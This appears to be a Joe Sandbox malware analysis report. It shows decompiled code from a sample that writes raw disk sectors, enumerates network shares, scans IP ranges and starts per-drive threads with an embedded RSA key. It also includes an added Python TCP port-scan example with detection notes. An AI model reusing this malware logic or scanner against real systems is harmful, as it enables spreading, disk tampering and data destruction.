    0x011e6629
    0x00000000
    0x011e5d9c
    0x011e5da1
    0x011e5da6
    0x011e5daa
    0x011e5dac
    0x011e6328
    0x00000000
    0x011e5db2
    0x011e5db7
    0x011e5dc3
    0x011e5dc8
    0x011e5dca
    0x011e632f
    0x011e6333
    0x011e633c
    0x00000000
    0x011e5dd0
    0x011e5dd0
    0x011e5ddc
    0x011e5de1
    0x011e5de3
    0x00000000
    0x011e5de9
    0x011e5df0
    0x011e5df9
    0x011e5dfe
    0x011e5e00
    0x011e6341
    0x011e6341
    0x00000000
    0x011e5e06
    0x011e5e1b
    0x011e5e20
    0x011e5e22
    0x00000000
    0x011e5e28
    0x011e5e2d
    0x011e5e41
    0x011e5e46
    0x011e5e48
    0x011e6657
    0x011e6657
    0x011e665e
    0x011e6662
    0x011e6666
    0x011e666a
    0x011e666e
    0x00000000
    0x011e5e4e
    0x011e5e4e
    0x011e5e52
    0x011e5e56
    0x011e5e67
    0x011e5e6c
    0x011e5e6e
    0x011e6672
    0x011e6672
    0x00000000
    0x011e5e74
    0x011e5e74
    0x011e5ea1
    0x011e5ea6
    0x011e5ea8
    0x00000000
    0x011e5eae
    0x011e5eb7
    0x011e5ebc
    0x011e5ec1
    0x011e5ec3
    0x011e6684
    0x011e6684
    0x011e6673
    0x011e6673
    0x011e6677
    0x011e667b
    0x011e667f
    0x011e6680
    0x00000000
    0x011e5ec9
    0x011e5ed3
    0x011e5ed8
    0x011e5eda
    0x00000000
    0x011e5ee0
    0x011e5ee5
    0x011e5eea
    0x011e5eec
    0x00000000
    0x011e5ef2
    0x011e5efc
    0x011e5f01
    0x011e5f03
    0x00000000
    0x011e5f09
    0x011e5f0e
    0x011e5f13
    0x011e5f15
    0x00000000
    0x011e5f1b
    0x011e5f20
    0x011e5f25
    0x011e5f27
    0x00000000
    0x011e5f2d
    0x011e5f37
    0x011e5f3c
    0x011e5f3e
    0x00000000
    0x011e5f44
    0x011e5f49
    0x011e5f4e
    0x011e5f50
    0x00000000
    0x011e5f56
    0x011e5f60
    0x011e5f65
    0x011e5f67
    0x00000000
    0x011e5f6d
    0x011e5f77
    0x011e5f7c
    0x011e5f7e
    0x00000000
    0x011e5f84
    0x011e5f89
    0x011e5f8e
    0x011e5f90
    0x00000000
    0x011e5f96
    0x011e5f9b
    0x011e5fa0
    0x011e5fa2
    0x00000000
    0x011e5fa8
    0x011e5fb2
    0x011e5fb7
    0x011e5fb9
    0x00000000
    0x011e5fbf
    0x011e5fc9
    0x011e5fce
    0x011e5fd0
    0x00000000
    0x011e5fd6
    0x011e5fdb
    0x011e5fe0
    0x011e5fe2
    0x00000000
    0x011e5fe8
    0x011e5fed
    0x011e5ff2
    0x011e5ff4
    0x00000000
    0x011e5ffa
    0x011e6004
    0x011e6009
    0x011e600b
    0x00000000
    0x011e6011
    0x011e601b
    0x011e6020
    0x011e6022
    0x00000000
    0x011e6028
    0x011e602d
    0x011e6032
    0x011e6034
    0x00000000
    0x011e603a
    0x011e6044
    0x011e6049
    0x011e604b
    0x00000000
    0x011e6051
    0x011e6056
    0x011e605b
    0x011e605d
    0x00000000
    0x011e6063
    0x011e606d
    0x011e6072
    0x011e6074
    0x00000000
    0x011e607a
    0x011e607f
    0x011e6084
    0x011e6086
    0x00000000
    0x011e608c
    0x011e6096
    0x011e609b
    0x011e609d
    0x00000000
    0x011e60a3
    0x011e60a8
    0x011e60ad
    0x011e60af
    0x00000000
    0x011e60b5
    0x011e60bf
    0x011e60c4
    0x011e60c6
    0x00000000
    0x011e60cc
    0x011e60d1
    0x011e60d6
    0x011e60d8
    0x00000000
    0x011e60de
    0x011e60e3
    0x011e60e9
    0x011e60fb
    0x011e6100
    0x011e6102
    0x00000000
    0x011e6108
    0x011e6131
    0x011e6136
    0x011e6138
    0x00000000
    0x011e613e
    0x011e613e
    0x011e6141
    0x011e6143
    0x011e6146
    0x011e614c
    0x011e614c
    0x011e614c
    0x011e614c
    0x011e6159
    0x011e615e
    0x011e6163
    0x011e6165
    0x00000000
    0x011e616b
    0x011e6170
    0x011e6175
    0x011e6177
    0x00000000
    0x011e617d
    0x011e6187
    0x011e618c
    0x011e618e
    0x00000000
    0x011e6194
    0x011e619e
    0x011e61a3
    0x011e61a5
    0x00000000
    0x011e61ab
    0x011e61b0
    0x011e61b5
    0x011e61b7
    0x00000000
    0x011e61bd
    0x011e61c7
    0x011e61cc
    0x011e61ce
    0x00000000
    0x011e61d4
    0x011e61d9
    0x011e61de
    0x011e61e0
    0x00000000
    0x011e61e6
    0x011e61f0
    0x011e61f5
    0x011e61f7
    0x00000000
    0x011e61fd
    0x011e6202
    0x011e6207
    0x011e6209
    0x00000000
    0x011e620f
    0x011e6214
    0x011e6219
    0x011e621b
    0x00000000
    0x011e6221
    0x011e6221
    0x011e6224
    0x011e6226
    0x011e6229
    0x011e622f
    0x011e622f
    0x011e622f
    0x011e622f
    0x011e6233
    0x011e6247
    0x011e624c
    0x011e624d
    0x011e6251
    0x011e6255
    0x011e6259
    0x011e625a
    0x011e625c
    0x011e625e
    0x011e662b
    0x011e662b
    0x011e662d
    0x011e662d
    0x011e6264
    0x011e6264
    0x011e6269
    0x011e626b
    0x00000000
    0x011e6271
    0x011e6271
    0x011e6279
    0x011e6279
    0x011e627e
    0x00000000
    0x011e6280
    0x011e6289
    0x011e628e
    0x011e6290
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e6290
    0x00000000
    0x011e6296
    0x011e6296
    0x011e629a
    0x011e629a
    0x011e62a3
    0x011e62ad
    0x011e62ad
    0x011e62b0
    0x00000000
    0x00000000
    0x011e62b2
    0x011e62b7
    0x011e62bc
    0x011e62be
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e62c4
    0x011e62c4
    0x011e62c5
    0x011e62c8
    0x011e62a6
    0x011e62a9
    0x011e62ad
    0x011e62b0
    0x00000000
    0x00000000
    0x011e62ca
    0x011e62ca
    0x00000000
    0x011e62ca
    0x00000000
    0x011e62c8
    0x011e62ad
    0x011e626b
    0x011e625e
    0x011e621b
    0x011e6209
    0x011e61f7
    0x011e61e0
    0x011e61ce
    0x011e61b7
    0x011e61a5
    0x011e618e
    0x011e6177
    0x011e6165
    0x011e6138
    0x011e6102
    0x011e60d8
    0x011e60c6
    0x011e60af
    0x011e609d
    0x011e6086
    0x011e6074
    0x011e605d
    0x011e604b
    0x011e6034
    0x011e6022
    0x011e600b
    0x011e5ff4
    0x011e5fe2
    0x011e5fd0
    0x011e5fb9
    0x011e5fa2
    0x011e5f90
    0x011e5f7e
    0x011e5f67
    0x011e5f50
    0x011e5f3e
    0x011e5f27
    0x011e5f15
    0x011e5f03
    0x011e5eec
    0x011e5eda
    0x011e5ec3
    0x011e5ea8
    0x011e5e6e
    0x011e5e48
    0x011e5e22
    0x011e5e00
    0x011e5de3
    0x011e5dca
    0x011e5dac
    0x011e5d5a
    0x011e5d5a
    0x011e5d5f
    0x00000000
    0x011e5d61
    0x011e5d61
    0x011e5d66
    0x011e62cd
    0x011e62e5
    0x011e62ec
    0x011e62f6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011e5d66
    0x011e5d5f
    0x00000000
    0x00000000
    0x00000000
    0x011e5c46
    0x011e5c3f
    0x011e5c38
    0x011e5c27
    0x011e5c1a
    0x011e5c10
    0x011e5bd1
    0x011e5bc4
    0x011e5bb8
    0x011e5b6f
    0x011e5b5c
    0x011e5b3b
    0x011e5b1a
    0x011e5b0e
    0x011e6632
    0x011e6638
    0x011e6638
    0x011e631c
    0x00000000

    APIs
      • Part of subcall function 011E6727: socket.WS2_32(00000002,00000001,00000006), ref: 011E6737
      • Part of subcall function 011E6727: ioctlsocket.WS2_32(00000000,8004667E,000001BD), ref: 011E674C
      • Part of subcall function 011E6727: htons.WS2_32(00058778), ref: 011E6784
      • Part of subcall function 011E6727: inet_addr.WS2_32(002F1C10), ref: 011E6791
      • Part of subcall function 011E6727: connect.WS2_32(00000000,?,00000010), ref: 011E67A1
      • Part of subcall function 011E20B2: GetTickCount.KERNEL32(011E5A94), ref: 011E20B2
      • Part of subcall function 011E2F88: memcpy.MSVCRT ref: 011E304E
      • Part of subcall function 011E20D0: GetProcessHeap.KERNEL32(00000008,000001BD,011E27B4,?,00000065,00000000,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E20D9
      • Part of subcall function 011E20D0: HeapFree.KERNEL32(00000000,?,00000065), ref: 011E20E0
      • Part of subcall function 011E1000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E1008
      • Part of subcall function 011E1000: RtlAllocateHeap.NTDLL(00000000,?,011E271B,00000062,0000FEFF,?,002F1C10,000001BD), ref: 011E100F
      • Part of subcall function 011E3EC8: rand.MSVCRT ref: 011E4030
    • rand.MSVCRT ref: 011E5C7A
      • Part of subcall function 011E407B: memcpy.MSVCRT ref: 011E4138
      • Part of subcall function 011E407B: memcpy.MSVCRT ref: 011E418C
      • Part of subcall function 011E407B: Sleep.KERNEL32(00000456,00001000,002F1C10,?,002F1C10,?,0000C000,00008000,00000002,002F1C10,76E6C426,0000008E,00000000,000000FF,00058778,002F1C10), ref: 011E4287
      • Part of subcall function 011E42DF: rand.MSVCRT ref: 011E4302
      • Part of subcall function 011E42DF: memcpy.MSVCRT ref: 011E4397
      • Part of subcall function 011E42DF: memcpy.MSVCRT ref: 011E43EA
      • Part of subcall function 011E489C: memcpy.MSVCRT ref: 011E492E
      • Part of subcall function 011E489C: memcpy.MSVCRT ref: 011E497E
      • Part of subcall function 011E2547: memcpy.MSVCRT ref: 011E2613
      • Part of subcall function 011E688F: memset.MSVCRT ref: 011E68AE
      • Part of subcall function 011E688F: select.WS2_32(00000000,00000000,?,00000000,000001BD), ref: 011E68E4
      • Part of subcall function 011E688F: send.WS2_32(?,000001BD,002F1C10,00000000), ref: 011E68FC
      • Part of subcall function 011E3B5D: memset.MSVCRT ref: 011E3B95
    • Sleep.KERNELBASE(00000456,?,?,?,?,?,?,?,00000001,?,?,?,00001000,?,?,?), ref: 011E5E2D
    • Sleep.KERNELBASE(00000456,?,?,002F1C10,00058778,?,?,002F1C10,00058778,?,?,002F1C10,00058778,?,?,002F1C10), ref: 011E60E3
    • closesocket.WS2_32(?), ref: 011E6146
    • closesocket.WS2_32(?), ref: 011E6229
      • Part of subcall function 011E3C0A: memset.MSVCRT ref: 011E3C2F
      • Part of subcall function 011E3C0A: memset.MSVCRT ref: 011E3C5D
    • Sleep.KERNELBASE(00000456,00000000,?,00000014,?,?,?,?,?,?,?,?,?,?,?,?), ref: 011E62F6
      • Part of subcall function 011E2068: closesocket.WS2_32(?), ref: 011E2076
      • Part of subcall function 011E20EA: FindResourceW.KERNEL32(00000004,0000000A,0000FEFF), ref: 011E210C
    • memcpy.MSVCRT ref: 011E64F8
    • memcpy.MSVCRT ref: 011E651F
    • Sleep.KERNELBASE(00000456), ref: 011E65AA
      • Part of subcall function 011E3DD7: memcpy.MSVCRT ref: 011E3E22
      • Part of subcall function 011E330E: memcpy.MSVCRT ref: 011E33A1
      • Part of subcall function 011E330E: memcpy.MSVCRT ref: 011E345F
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    APIs
    • memset.MSVCRT ref: 011EA317
    • socket.WS2_32(00000002,00000001,00000000), ref: 011EA335
    • htons.WS2_32(?), ref: 011EA355
    • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 011EA369
    • connect.WS2_32(00000000,?,00000010), ref: 011EA37B
    • select.WS2_32(00000001,00000000,?,00000000,?), ref: 011EA3A8
    • __WSAFDIsSet.WS2_32(00000000,?), ref: 011EA3BB
    • closesocket.WS2_32(00000000), ref: 011EA3C9
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
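The API sequence listed for the function at 011EA317 (socket, htons, ioctlsocket with FIONBIO = 0x8004667E, connect, select, __WSAFDIsSet, closesocket) is the standard non-blocking connect with a select() timeout, i.e. a TCP port probe. The block below is an added example that re-creates that pattern; it is not code from the sample or from the Joe Sandbox report. It uses Python's portable socket API so it runs on any host, and the hostnames, ports and the 2-second timeout in `demo()` are assumptions for the demonstration. Note one detail visible in the listing: the sample's select() call passes NULL for exceptfds, and on Winsock a failed non-blocking connect is signalled through exceptfds, not writefds, so for the sample a refused connection looks the same as a timeout. The example below instead reads SO_ERROR after the socket becomes writable, which distinguishes the two.

```python
"""Non-blocking TCP connect with a select() timeout (added example, not
code from the sample).  The portable socket calls map onto the Winsock
imports in the report: socket / ioctlsocket(FIONBIO) / connect / select /
__WSAFDIsSet / closesocket."""
import errno
import select
import socket

# connect_ex() codes meaning "handshake started, poll for the outcome".
# 10035 is WSAEWOULDBLOCK, what Winsock returns for a non-blocking connect.
_IN_PROGRESS = {errno.EINPROGRESS, errno.EWOULDBLOCK, errno.EAGAIN, 10035}


def tcp_port_open(host, port, timeout=1.0):
    """Return True if a TCP handshake to host:port completes within timeout."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)   # socket(2, 1, 0)
    try:
        s.setblocking(False)                                    # ioctlsocket(FIONBIO, 1)
        rc = s.connect_ex((host, port))                         # connect(): returns at once
        if rc == 0:
            return True                                         # loopback may finish immediately
        if rc not in _IN_PROGRESS:
            return False                                        # refused/unreachable right away
        # select() on writefds: the socket becomes writable once the attempt ends.
        _, writable, _ = select.select([], [s], [], timeout)
        if not writable:
            return False                                        # timed out (FD_ISSET false)
        # Writable only says the attempt finished; SO_ERROR says whether it succeeded.
        return s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR) == 0
    finally:
        s.close()                                               # closesocket()


def demo():
    """Probe one listening and one closed loopback port (assumed test setup).
    Returns (open_result, closed_result)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    open_port = srv.getsockname()[1]
    tmp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()                                   # nothing listens on this port now
    try:
        return (tcp_port_open("127.0.0.1", open_port, 2.0),
                tcp_port_open("127.0.0.1", closed_port, 2.0))
    finally:
        srv.close()


if __name__ == "__main__":
    print(demo())
```

Because the connect never blocks, a loop around `tcp_port_open` can sweep a /24 for one port in a few seconds, which is the behaviour that a network sensor should key on: many SYNs from one host to the same port across many destinations inside a short window.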
    C-Code - Quality: 100%
    			E011E1F74(void* _a4, int _a8, void* _a12, int _a16, void* _a20, int _a24, void** _a28, long* _a32, void* _a36, intOrPtr _a40, void* _a44, intOrPtr _a48) {
    				long _t26;
    				void* _t28;
    				void* _t30;
    				int _t37;
    				void** _t44;
    				int _t46;
    				void* _t52;
    				void* _t54;
    				void* _t55;
    				int _t57;
    
    				_t46 = _a24;
    				_t57 = _a16;
    				_t26 = _t57 + _t46 + 0x76fc2;
    				 *_a32 = _t26;
    				if(_a40 >= 0x2000) {
    					_a40 = 0x1fff;
    				}
    				if(_a48 > 0x80) {
    					_a48 = 0x7f;
    				}
    				if(_t26 >= _a8 + _t57 + _t46 + 0x481c) {
    					_t28 = HeapAlloc(GetProcessHeap(), 8, _t26); // executed
    					_t44 = _a28;
    					_t52 = _t28;
    					 *_t44 = _t28;
    					if(memcpy(_t52, _a12, _t57) == 0) {
    						L12:
    						_t30 = 0;
    						L13:
    						return _t30;
    					}
    					_t54 = _t52 + _t57;
    					if(memcpy(_t54, _a44, _a48 + _a48) == 0) {
    						goto L12;
    					}
    					_t55 = _t54 + 0x100;
    					if(memcpy(_t55, _a36, _a40 + _a40) == 0) {
    						goto L12;
    					}
    					_t37 = _a8;
    					 *(_t55 + 0x4718) = _t37;
    					if(memcpy(_t55 + 0x471c, _a4, _t37) == 0 || memcpy( *_t44 + _t57 + 0x76fc2, _a20, _a24) == 0) {
    						goto L12;
    					} else {
    						_t30 = 1;
    						goto L13;
    					}
    				} else {
    					return 0;
    				}
    			}
    APIs
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 95%
    			E011E12D5(void* __ecx, CHAR* _a4, void* _a8) {
    				long _v8;
    				int _t10;
    				signed int _t11;
    				signed int _t13;
    				int _t16;
    				signed int _t17;
    				void* _t20;
    				signed int _t28;
    
    				_t28 = 0;
    				_v8 = 0;
    				if(_a4 != 0) {
    					memset(_a8, 0, 0x200);
    					_t20 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
    					if(_t20 != 0xffffffff) {
    						_push(0);
    						_t10 = SetFilePointerEx(_t20, 0, 0, 0); // executed
    						if(_t10 == 0) {
    							L8:
    							_t11 = GetLastError();
    							if(_t11 > _t28) {
    								_t11 = _t11 & 0x0000ffff | 0x80070000;
    							}
    							_t28 = _t11;
    						} else {
    							_t16 = ReadFile(_t20, _a8, 0x200,  &_v8, 0); // executed
    							if(_t16 == 0) {
    								goto L8;
    							}
    						}
    						CloseHandle(_t20);
    					} else {
    						_t17 = GetLastError();
    						if(_t17 > 0) {
    							_t17 = _t17 & 0x0000ffff | 0x80070000;
    						}
    						_t28 = _t17;
    					}
    					_t13 = _t28;
    				} else {
    					_t13 = 0x80070057;
    				}
    				return _t13;
    			}
    APIs
    • memset.MSVCRT ref: 011E12FB
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 011E1312
    • GetLastError.KERNEL32 ref: 011E131F
    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 011E1340
    • ReadFile.KERNEL32(00000000,00000200,00000200,00000000,00000000), ref: 011E1354
    • GetLastError.KERNEL32 ref: 011E135E
    • CloseHandle.KERNEL32(00000000), ref: 011E1375
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E7A17(intOrPtr _a4, int _a8) {
    				int _v8;
    				int _v12;
    				int _v16;
    				void* _v20;
    				void* _v24;
    				void* __esi;
    				int _t36;
    				int _t42;
    				short* _t47;
    				signed int _t55;
    				signed int _t56;
    				signed int _t58;
    				intOrPtr* _t61;
    				void* _t63;
    				signed int _t66;
    				void* _t67;
    
    				_v12 = _v12 | 0xffffffff;
    				_v16 = 0;
    				_v8 = 0x4000;
    				_t36 = WNetOpenEnumW(1, 0, 0, _a8,  &_v20); // executed
    				if(_t36 == 0) {
    					_t63 = GlobalAlloc(0x40, _v8);
    					_v24 = _t63;
    					if(_t63 != 0) {
    						_v16 = 1;
    						while(1) {
    							memset(_t63, 0, _v8);
    							_t67 = _t67 + 0xc;
    							_t42 = WNetEnumResourceW(_v20,  &_v12, _t63,  &_v8);
    							if(_t42 != 0) {
    								break;
    							}
    							_a8 = 0;
    							if(_v12 > 0) {
    								_t16 = _t63 + 0x14; // 0x14
    								_t61 = _t16;
    								do {
    									_t55 = 2;
    									if(( *(_t61 - 8) & _t55) != _t55) {
    										_t47 =  *_t61;
    										if(_t47 != 0 &&  *_t47 == 0x5c &&  *((short*)(_t47 + 2)) == 0x5c) {
    											_t56 =  *(_t47 + 4) & 0x0000ffff;
    											if(_t56 != 0) {
    												_t66 = _t56;
    												while(_t66 != 0x5c) {
    													_t55 = _t55 + 1;
    													_t58 =  *(_t47 + _t55 * 2) & 0x0000ffff;
    													_t66 = _t58;
    													if(_t58 != 0) {
    														continue;
    													}
    													goto L15;
    												}
    											}
    											L15:
    											 *(_t47 + _t55 * 2) = 0;
    											E011E6FC7( *_t61 + 4, 0, _a4);
    											_t63 = _v24;
    										}
    									} else {
    										_t18 = _t61 - 0x14; // 0x0
    										E011E7A17(_a4, _t18);
    									}
    									_a8 = _a8 + 1;
    									_t61 = _t61 + 0x20;
    								} while (_a8 < _v12);
    							}
    						}
    						if(_t42 != 0x103) {
    							_v16 = 0;
    						}
    						GlobalFree(_t63);
    						WNetCloseEnum(_v20);
    					}
    				}
    				return _v16;
    			}
    APIs
    • WNetOpenEnumW.MPR(00000001,00000000,00000000,?,0000FFFF), ref: 011E7A3C
    • GlobalAlloc.KERNEL32(00000040,00004000,00000000,?,00000000,0000FFFF), ref: 011E7A50
    • memset.MSVCRT ref: 011E7A6B
    • WNetEnumResourceW.MPR(0000FFFF,000000FF,00000000,00004000), ref: 011E7A7F
    • GlobalFree.KERNEL32(00000000), ref: 011E7B18
    • WNetCloseEnum.MPR(0000FFFF), ref: 011E7B21
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 95%
    			E011E1384(signed int __eax, void* __ecx, CHAR* _a4, void* _a8) {
    				long _v8;
    				int _t9;
    				signed int _t10;
    				signed int _t12;
    				int _t15;
    				signed int _t16;
    				void* _t19;
    				signed int _t23;
    				signed int _t26;
    
    				_t23 = 0;
    				_t26 = __eax;
    				_v8 = 0;
    				if(_a4 != 0) {
    					_t19 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0, 0);
    					if(_t19 != 0xffffffff) {
    						_push(0);
    						_t9 = SetFilePointerEx(_t19, _t26 << 9, 0, 0); // executed
    						if(_t9 == 0) {
    							L8:
    							_t10 = GetLastError();
    							if(_t10 > _t23) {
    								_t10 = _t10 & 0x0000ffff | 0x80070000;
    							}
    							_t23 = _t10;
    						} else {
    							_t15 = WriteFile(_t19, _a8, 0x200,  &_v8, 0); // executed
    							if(_t15 == 0) {
    								goto L8;
    							}
    						}
    						CloseHandle(_t19);
    					} else {
    						_t16 = GetLastError();
    						if(_t16 > 0) {
    							_t16 = _t16 & 0x0000ffff | 0x80070000;
    						}
    						_t23 = _t16;
    					}
    					_t12 = _t23;
    				} else {
    					_t12 = 0x80070057;
    				}
    				return _t12;
    			}
    APIs
    • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 011E13AD
    • GetLastError.KERNEL32(?,?,011E1852,00000000,00000000), ref: 011E13BA
    • SetFilePointerEx.KERNEL32(00000000,00000020,00000000,00000000,00000000), ref: 011E13DC
    • WriteFile.KERNEL32(00000000,011E1852,00000200,00000000,00000000), ref: 011E13F4
    • GetLastError.KERNEL32(?,?,011E1852,00000000,00000000), ref: 011E13FE
    • CloseHandle.KERNEL32(00000000), ref: 011E1415
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 58%
    			E011E8E04(void* __ecx, void* _a4) {
    				void _v8;
    				intOrPtr _v12;
    				void* __esi;
    				intOrPtr _t10;
    				void* _t14;
    				void _t21;
    				void* _t24;
    				intOrPtr* _t28;
    				void* _t30;
    
    				_t30 = _a4;
    				_t21 =  *_t30;
    				_t10 =  *((intOrPtr*)(_t30 + 4));
    				_v8 = _t21;
    				_v12 = _t10;
    				if(_t21 >= _t10) {
    					L6:
    					LocalFree(_t30);
    					return 0;
    				}
    				_t28 = __imp__#14;
    				do {
    					_t14 = E011EA3D9( *_t28(_t21)); // executed
    					if(_t14 != 0) {
    						__imp__#12( *_t28(_t21));
    						_t24 = E011E6916(_t15);
    						if(_t24 != 0) {
    							E011E6FC7(_t16, 0,  *((intOrPtr*)(_t30 + 8)));
    							HeapFree(GetProcessHeap(), 0, _t24);
    							_t30 = _a4;
    						}
    					}
    					_t21 = _v8 + 1;
    					_v8 = _t21;
    				} while (_t21 < _v12);
    				goto L6;
    			}
    APIs
    • htonl.WS2_32 ref: 011E8E25
    • htonl.WS2_32 ref: 011E8E32
    • inet_ntoa.WS2_32(00000000), ref: 011E8E35
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,00000000,00000000,769E2D57,?,011E91A4,00000000), ref: 011E6935
      • Part of subcall function 011E6916: GetProcessHeap.KERNEL32(00000000,00000000,?,011E91A4,00000000), ref: 011E6942
      • Part of subcall function 011E6916: HeapAlloc.KERNEL32(00000000,?,011E91A4,00000000), ref: 011E6949
      • Part of subcall function 011E6916: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,011E91A4,000000FF,00000000,00000000,?,011E91A4,00000000), ref: 011E6961
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,00000000), ref: 011E8E53
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 011E8E5A
    • LocalFree.KERNEL32(?), ref: 011E8E70
    Memory Dump Source
    • Source File: 00000001.00000002.1705953011.011E1000.00000020.sdmp, Offset: 011E0000, based on PE: true
    • Associated: 00000001.00000002.1705935282.011E0000.00000002.sdmp
    • Associated: 00000001.00000002.1705968355.011ED000.00000002.sdmp
    • Associated: 00000001.00000002.1706001332.011F6000.00000004.sdmp
    • Associated: 00000001.00000002.1706016369.01200000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_11e0000_rundll32.jbxd
    C-Code - Quality: 100%
    			E011E1EEF(void* __ecx) {
    				short _v6;
    				short _v8;
    				short _v10;
    				short _v12;
    				signed int _t14;
    				void* _t17;
    				short _t19;
    				short _t20;
    				signed int _t24;
    				signed int _t31;
    
    				_t14 = GetLogicalDrives();
    				_t24 = _t14;
    				_t31 = 0x1f;
    				do {
    					_t17 = 1 << _t31;
    					if((_t24 & 1) != 0) {
    						_t3 = _t31 + 0x41; // 0x60
    						_v12 = _t3;
    						_t19 = 0x3a;
    						_v10 = _t19;
    						_t20 = 0x5c;
    						_v8 = _t20;
    						_v6 = 0;
    						_t17 = GetDriveTypeW( &_v12);
    						if(_t17 == 3) {
    							_t17 = LocalAlloc(0x40, 0x20);
    							if(_t17 != 0) {
    								 *(_t17 + 0x10) = L"MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+YLIBZzQ2ZTK0A2DtX4GRKxEEFLCy7vP12EYOPXknVy/+mf0JFWixz29QiTf5oLu15wVLONCuEibGaNNpgq+CXsPwfITDbDDmdrRIiUEUw6o3pt5pNOskfOJbMan2TZu6zfhzuts7KafP5UA8/0Hmf5K3/F9Mf9SE68EZjK+cIiFlKeWndP0XfRCYXI9AJYCeaOu7CXF6U0AVNnNjvLeOn42LHFUK4o6JwIDAQAB";
    								 *((intOrPtr*)(_t17 + 0x1c)) = 0;
    								 *_t17 = _v12;
    								 *((intOrPtr*)(_t17 + 4)) = _v8;
    								_t17 = CreateThread(0, 0, E011E1E51, _t17, 0, 0); // executed
    							}
    						}
    					}
    					_t31 = _t31 - 1;
    				} while (_t31 >= 0);
    				return _t17;
    			}
    APIs
    • GetLogicalDrives.KERNEL32 ref: 011E1EF7
    • GetDriveTypeW.KERNELBASE(?,?,?,?,011E808B), ref: 011E1F2E
    • LocalAlloc.KERNEL32(00000040,00000020,?,?,?,011E808B), ref: 011E1F3D
    • CreateThread.KERNEL32(00000000,00000000,011E1E51,00000000,00000000,00000000), ref: 011E1F66
    Strings
    • MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y, xrefs: 011E1F4A
